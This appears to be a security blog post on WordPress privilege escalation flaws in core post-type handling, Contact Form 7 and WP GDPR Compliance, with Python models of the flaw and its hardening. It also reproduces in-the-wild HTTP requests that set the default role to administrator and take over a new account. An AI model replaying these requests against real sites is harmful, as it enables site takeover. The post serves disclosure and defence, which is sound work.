WordPress is one of the most popular and versatile content management systems, powering more than 30 percent of the top websites. That popularity has also made it a prime target: a steady stream of WordPress security vulnerabilities is discovered and exploited by web attackers. In this post we discuss WordPress privilege escalation vulnerabilities, first in WordPress core's handling of post types and then in the Contact Form 7 and WP GDPR Compliance plugins, and how to fix them.
Let us discuss this vulnerability in detail.
What Is WordPress Privilege Escalation through Post Types?
This vulnerability allows a low-privileged authenticated user, such as a Contributor, to create posts of arbitrary post types, bypassing the checks WordPress performs when a post is submitted.
The attacker can therefore create content they are not allowed to create and abuse the features of custom post types registered by plugins. Depending on which plugins are installed, this opens the way to further exploitation; the two plugin cases below show how. WordPress core addressed the issue in version 5.0.1, so sites on an older version should update.
What Impact an Attacker Can Have
WordPress started out as blogging software for creating and publishing posts. Over time further types of posts were introduced, for instance pages and media entries (images, videos, etc.). Plugins can register new post types of their own, such as contact forms or products.
Depending on the purpose of a post type, the plugin that registers it provides new, type-specific features. A contact form plugin, for instance, may allow the creation of a contact form with a file upload field, say for resumes.
The creator of the contact form defines which file types are permitted. If an attacker can edit that setting, they can permit PHP files and then execute arbitrary code on the web server.
The privilege escalation attack lets lower-privileged users evade the security checks WordPress performs when creating a post, create posts of any type and thereby abuse the features of custom post types.
To register a new post type, a plugin calls register_post_type() with the name of the new post type and an array of arguments describing it.
How Are Custom Post Types Protected?
Each post type typically has its own editor page, for instance example.com/wordpress/wp-admin/?page=example_post_type_editor
If the plugin developer decided that only administrators may use the plugin's post type, he typically checks at the top of that page whether the current user is an administrator and aborts otherwise.
Submission of WordPress Post
As mentioned above, although each post type has its own editor page, they all use the same WordPress post submission API to insert and update posts, via the function wp_write_post(). This function reads user input such as $_POST['post_content'], $_POST['post_type'] and $_POST['post_title'] to work out how the post should be processed.
In the first step of submitting a post, WordPress must determine whether you want to modify an existing post or create a new one. It does so by checking whether you supplied a post ID, which it accepts from either $_POST['post_ID'] or $_GET['post']. If an ID is set, the request is treated as an edit of the post with that ID; otherwise it is treated as the creation of a new post.
The second step determines the type of the post. If a post ID was supplied, WordPress reads the post_type column of that row from the wp_posts table. For a new post, the target post type is taken from $_POST['post_type'].
Once WordPress knows the type of the post being created or edited, it verifies that you are authorized to use that post type. It does this by checking a nonce that can only be obtained from the editor page of that post type.
The nonce name is derived from the post type: for the built-in post type post, $nonce_name is add-post; for a post type named example_post_type it is add-example_post_type. You only hold such a nonce if you are allowed to create posts of that type, because the editor page of the post type, which is the only place the nonce is issued, is only reachable by such users.
Where WordPress Fails
A lower-privileged attacker, for instance an authenticated Contributor, cannot reach the editor page of the example post type and hence cannot obtain its nonce. He can, however, always obtain the nonce for a normal post, whose internal post type is simply post.
So he sets the post ID to that of a post with post type post and passes the nonce verification with the add-post nonce.
Using this route alone, only the existing post can be modified, and its post_type cannot be overwritten: when a post ID is set, WordPress removes the post_type parameter before the post is updated.
To be precise, WordPress only strips the $post_type parameter when $_POST['post_ID'] is set. But the attacker can supply the post ID through either $_GET['post'] or $_POST['post_ID']. If he sends it through $_GET['post'] only, the following happens:
- WordPress sees that a post ID is set and reads the post's type from the database.
- WordPress verifies that the attacker supplied a valid nonce for that post type (which he always has for a normal post).
- After the nonce check passes, WordPress decides whether to call wp_insert_post() or wp_update_post(). It does so by checking whether $_POST['post_ID'] is set. If it is, wp_update_post() is called and the $post_type parameter is discarded, so the attacker cannot overwrite the post type. If it is not set, WordPress calls wp_insert_post() and uses $_POST['post_type'] as the type of the new post.
Because the third step looks only at $_POST['post_ID'] and forgets $_GET['post'], the attacker passes the nonce verification in step 2 using the ID of a normal post and, in step 3, creates a brand-new post of an arbitrary post type. The logic described here is abstracted and simplified; the real code is spread over several files and function calls, which is exactly what makes this kind of inconsistency easy to introduce.
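The following model reproduces the three steps above so the inconsistency can be seen end to end. It is an added example written for this article in Python, not WordPress code: the nonce scheme, the Site class and the role names are constructed stand-ins, capability and ownership checks are left out because they are not what failed, and the consistent=True variant is a hardening of this model (resolve the ID once and use it for every decision), not the upstream WordPress patch.

```python
"""Model of the WordPress post-submission dispatch described above (constructed
illustration, not WordPress code). Steps: resolve the post ID, derive the post
type and check the 'add-<post_type>' nonce, then decide insert vs. update."""
import hashlib
import hmac

# Stand-in for the site-specific NONCE_SALT (constructed value).
NONCE_SALT = b"constructed-demo-salt"


def create_nonce(user, action):
    """Per-user, per-action token. A user only receives 'add-<post_type>' for
    post types whose editor page they can open."""
    msg = f"{user}|{action}".encode()
    return hmac.new(NONCE_SALT, msg, hashlib.sha256).hexdigest()[:10]


def verify_nonce(user, action, nonce):
    return hmac.compare_digest(create_nonce(user, action), nonce or "")


class Site:
    """Minimal stand-in for the wp_posts table."""

    def __init__(self):
        self.posts = {}
        self._next_id = 1

    def insert_post(self, post_type, title, author):
        pid = self._next_id
        self._next_id += 1
        self.posts[pid] = {"post_type": post_type, "post_title": title, "post_author": author}
        return pid

    def update_post(self, pid, fields):
        # Like wp_update_post() reached via edit_post(): post_type is not overwritable.
        allowed = ("post_title", "post_content")
        self.posts[pid].update({k: v for k, v in fields.items() if k in allowed})
        return pid


def handle_submission(site, user, GET, POST, consistent=False):
    """Dispatch a post-editor form submission.

    consistent=False reproduces the flawed logic: steps 1 and 2 accept the ID
    from $_GET['post'] or $_POST['post_ID'], step 3 looks at $_POST['post_ID']
    alone. consistent=True derives every decision from one resolved ID and
    rejects disagreeing IDs (a hardening for this model, not the upstream fix)."""
    # Step 1: which post does the request refer to?
    post_id = None
    if "post" in GET:
        post_id = int(GET["post"])
    elif "post_ID" in POST:
        post_id = int(POST["post_ID"])
    if consistent and "post" in GET and "post_ID" in POST and int(GET["post"]) != int(POST["post_ID"]):
        raise PermissionError("post ID mismatch")

    # Step 2: the post type that names the nonce comes from the database when an ID is known.
    if post_id is not None:
        post_type = site.posts[post_id]["post_type"]
    else:
        post_type = POST.get("post_type", "post")
    if not verify_nonce(user, "add-" + post_type, POST.get("_wpnonce")):
        raise PermissionError("nonce check failed for add-" + post_type)

    # Step 3: update an existing post or insert a new one?
    is_update = (post_id is not None) if consistent else ("post_ID" in POST)
    if is_update:
        return site.update_post(post_id, POST)
    # Insert path trusts $_POST['post_type'] although the nonce was checked for another type.
    return site.insert_post(POST.get("post_type", "post"), POST.get("post_title", ""), user)


def run_attack(consistent=False):
    """A Contributor who owns a normal post and holds its 'add-post' nonce tries to
    create an 'example_post_type' object. Returns the post_type of the post the
    request ended up touching."""
    site = Site()
    own = site.insert_post("post", "my draft", "contributor")
    forged = {
        "post_type": "example_post_type",
        "post_title": "injected",
        "_wpnonce": create_nonce("contributor", "add-post"),  # obtainable from the normal editor
    }
    touched = handle_submission(site, "contributor", {"post": str(own)}, forged, consistent)
    return site.posts[touched]["post_type"]


if __name__ == "__main__":
    print("vulnerable:", run_attack())                 # example_post_type
    print("consistent:", run_attack(consistent=True))  # post
```

With the flawed dispatch the request creates a new example_post_type post even though the only nonce presented was add-post; with a single resolved ID the same request can only update the attacker's own normal post. Sending no ID at all still fails, because the nonce is then checked against add-example_post_type.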
Let us now turn to two of the most popular WordPress plugins, Contact Form 7 and WP GDPR Compliance, and the vulnerabilities found in each.
Contact Form 7 Vulnerability: WordPress Privilege Escalation
A privilege escalation vulnerability was discovered in Contact Form 7 that allowed any logged-in user with the Contributor role to modify contact forms.
The issue affects Contact Form 7 5.0.3 and older and was patched in 5.0.4; update the plugin if you have not done so.
When a post type is registered, the capability_type argument (a string such as post) is used to build the read, edit and delete capabilities for that post type, unless they are set explicitly through the capabilities parameter. If the derived capabilities are the ones ordinary posts use, every role that has edit_posts, which includes Contributors, can edit the plugin's objects.
WordPress has multiple roles: Subscriber, Contributor, Author, Editor and Administrator. Because of this vulnerability, a user logged in as a Contributor could modify contact forms, something meant to be reserved for Administrators and Editors. The vulnerability is far more dangerous than it looks, for two reasons:
- Contact Form 7 accepted absolute file paths for attachments, e.g. /host/home/somefile.pdf. Being able to edit the form, the attacker could therefore read files from outside wp-content (for example the site's configuration files).
- filetypes: the same low-privileged user could change the filetypes option of an upload field (e.g. filetypes:gif|png|jpg|jpeg) to admit server-side scripts (filetypes:php|asp) and upload a web shell or reverse shell.
An attacker could therefore upload a file of any type into the wp-content directory and obtain a reverse shell, opening the door to further attacks.
As a temporary measure the plugin author blocked file paths that point outside the wp-content directory. To be safe, update to the latest version, move your attachment files under <your WordPress root>/wp-content/ and adjust the paths in the File Attachments fields accordingly.
How to Fix the Contact Form 7 WordPress Privilege Escalation Vulnerability?
- Update to the latest version of Contact Form 7.
- The updated version restricts the local file attachment feature: you can no longer specify an absolute path to a file outside the wp-content directory.
- Upload local file attachments into the wp-content directory with the WordPress media uploader, then reference them in the File Attachments field by a path inside wp-content (relative to wp-content or absolute). Only the location of the attachment files needs to change.
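Two checks follow from the fix described above: an attachment path must resolve to somewhere inside wp-content even after '..' segments and symlinks are taken into account, and the upload filetypes option must never admit an extension the web server executes, whoever edited the form. The block below is an added example written for this article in Python, not the plugin's PHP; WP_CONTENT_DIR, the extension list and the default type set are assumptions for the demo.

```python
"""Hardening model for the two Contact Form 7 weaknesses discussed above:
attachment paths that escape wp-content and editable 'filetypes' that admit
server-executable extensions. Constructed example, not plugin code."""
import os
import re

WP_CONTENT_DIR = "/var/www/html/wp-content"   # assumed install path for the demo

# Extensions the web server might execute; never allowed as upload types,
# regardless of which role edited the form (list is an assumption, extend per server).
EXECUTABLE_EXTS = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht",
    "asp", "aspx", "jsp", "jspx", "cgi", "pl", "sh", "htaccess",
}

DEFAULT_FILETYPES = {"gif", "png", "jpg", "jpeg", "pdf", "doc", "docx", "zip"}


def resolve_attachment(path, wp_content_dir=WP_CONTENT_DIR):
    """Resolve an attachment path and return it only if it lies inside wp-content.

    Relative paths are taken relative to wp-content. realpath() collapses '..'
    segments and follows symlinks before the containment check, so
    '/var/www/html/wp-content/../wp-config.php' is rejected."""
    candidate = path if os.path.isabs(path) else os.path.join(wp_content_dir, path)
    resolved = os.path.realpath(candidate)
    root = os.path.realpath(wp_content_dir)
    try:
        inside = os.path.commonpath([root, resolved]) == root
    except ValueError:   # mixed absolute/relative or different drives (Windows)
        inside = False
    return resolved if inside else None


def allowed_filetypes(option, default=DEFAULT_FILETYPES):
    """Parse a 'filetypes:gif|png|jpg' form option into a set of extensions,
    dropping anything executable and falling back to the default when the
    option is malformed."""
    m = re.fullmatch(r"filetypes:\s*([A-Za-z0-9|.]+)", option.strip())
    if not m:
        return set(default)
    exts = {e.lower().lstrip(".") for e in m.group(1).split("|") if e.strip(".")}
    return exts - EXECUTABLE_EXTS


def is_upload_permitted(filename, option):
    """Decide whether an uploaded file's extension matches the sanitized option.
    Judged by the last extension, so 'shell.php.jpg' counts as 'jpg'; servers
    whose handler matches any '.php' segment need a separate multi-extension rule."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in allowed_filetypes(option)


if __name__ == "__main__":
    print(resolve_attachment("uploads/2018/11/brochure.pdf"))
    print(resolve_attachment("/var/www/html/wp-content/../wp-config.php"))  # None
    print(allowed_filetypes("filetypes:php|asp|pdf"))                      # {'pdf'}
```

The containment check is done on the resolved path rather than by string prefix, which is what defeats '..' and symlinked directories; the extension filter is applied when the option is read, so a form edited by a compromised Contributor cannot re-enable PHP uploads.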
Now, let us discuss WP GDPR Compliance plugin vulnerability in detail.
WordPress GDPR Compliance Plugin Privilege Escalation
The WP GDPR Compliance plugin has more than 100,000 active installations. The reported vulnerability allowed attackers to escalate privileges to administrator, and compromised sites were then used to attack further vulnerable websites. Any site running the plugin should update to the latest version or, if no update is available, remove the plugin immediately.
The plugin handles a few types of actions submitted through WordPress' admin-ajax.php endpoint. These include the data access and data deletion requests required by GDPR, but also changing the plugin's settings from the WordPress admin dashboard, and the vulnerable versions did not verify that the caller was allowed to change settings.
Besides storing arbitrary options, the plugin performs a do_action() call with the supplied name and value, which an attacker can use to trigger arbitrary WordPress actions.
Identifying the Attack
The attack observed in the wild proceeds in several stages.
- Enabling user registration and setting the default role
This is done with POST requests to /wp-admin/admin-ajax.php. The request that sets the default role to administrator looks like this:
Host: XXXXXX.COM
Accept-Encoding: gzip
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Referer: http://XXXXXX.COM/wp-login.php?action=rp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
BODY: action=wpgdprc_process_action&data=%7B%22type%22%3A%22save_setting%22%2C%22append%22%3Afalse%2C%22option%22%3A%22default_role%22%2C%22value%22+%3A%22administrator%22%7D&security=1e35284ab4
URL-decoded, the data parameter is the JSON object {"type":"save_setting","append":false,"option":"default_role","value":"administrator"}: the plugin is asked to store the WordPress core option default_role with the value administrator, so every newly registered user becomes an administrator.
- The attacker registers a new user
Most attacks in the wild try to register one of two usernames, t2trollherten and t3trollherten (the same accounts that appear in the wp_users rows in the cleanup section below).
The real POST request looks like this:
Request_URI: http://XXXXXX.COM/wp-login.php?action=register
BODY: redirect_to=&user_email=trollherten%40mail.com&user_login=t2trollherten&wp-submit=Register
- The attacker sets the password of the new user
Usually the attacker completes the takeover by running the password reset flow for the newly registered user.
The request looks like this:
URI: /wp-login.php?action=resetpass
Cookie: wordpress_test_cookie=WP+Cookie+check; path=/; wp-resetpass-464755d4cc9c2c0d7cc2b015eb2b7c0a=t2trollherten%3A76cnn4sryixU82wtCG9j; path=/wp-login.php; httponly;
BODY: pass1=0rt8Ka7slborUi&pass1-text=0rt8Ka7slborUi&pass2=0rt8Ka7slborUi&rp_key=76cnn4sryixU82wtCG9j&wp-submit=Reset%2BPassword
At this point the attacker holds an administrator account on the site.
What Attackers Do After Exploiting the Website
Once the site is compromised, the damage typically consists of:
- Changing the site URL (the siteurl and home options), usually for black-hat SEO redirects.
- Installing malicious WordPress plugins.
- Adding further malicious administrator users to the database.
- Uploading web shells into the document root of the website.
- Adding malicious WordPress cron jobs.
- Adding system crontab entries that reinfect the account after a cleanup.
- Injecting shells into existing files.
How to Fix WP GDPR Compliance Vulnerability?
Before you start recovering the website, update WP GDPR Compliance to the latest version (or remove it); otherwise the site will simply be reinfected.
The following steps fix the issue.
- Restore from a recent backup
Restoring a backup taken before the compromise is the most reliable step in cleaning a WordPress site. If you have no backup, continue with the next steps.
- Look for newly added users in the database and remove them
Check the wp_users table (adjust for your table prefix) for accounts you did not create, and verify their roles in wp_usermeta as well.
In the attacks observed, these two users were injected:
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
| 20 | t2trollherten | $P$ByTG6qJi/eGVCRB2i.n/wS80Y967ng/ | t2trollherten | firstname.lastname@example.org | | 2018-11-08 13:43:38 | | 0 | t2trollherten |
| 21 | t3trollherten | $P$Bb7f2NV78UD2/nNpB6aKCStQnit99l1 | t3trollherten | email@example.com | | 2018-11-08 15:58:44 | | 0 | t3trollherten |
- Look for newly created files in your hosting account
If several websites live in the same account, search the whole account, not just the directory of the hacked site.
A quick way is to use find to list files modified within the last few days. The command below lists everything modified in the last three days (note that -mtime -3 means newer than three days, whereas -mtime +3 would list only files older than that, which is the opposite of what you want here):
find . -type f -mtime -3
- Delete suspicious WordPress plugins
Review the installed plugins and remove any recently installed one you do not recognize.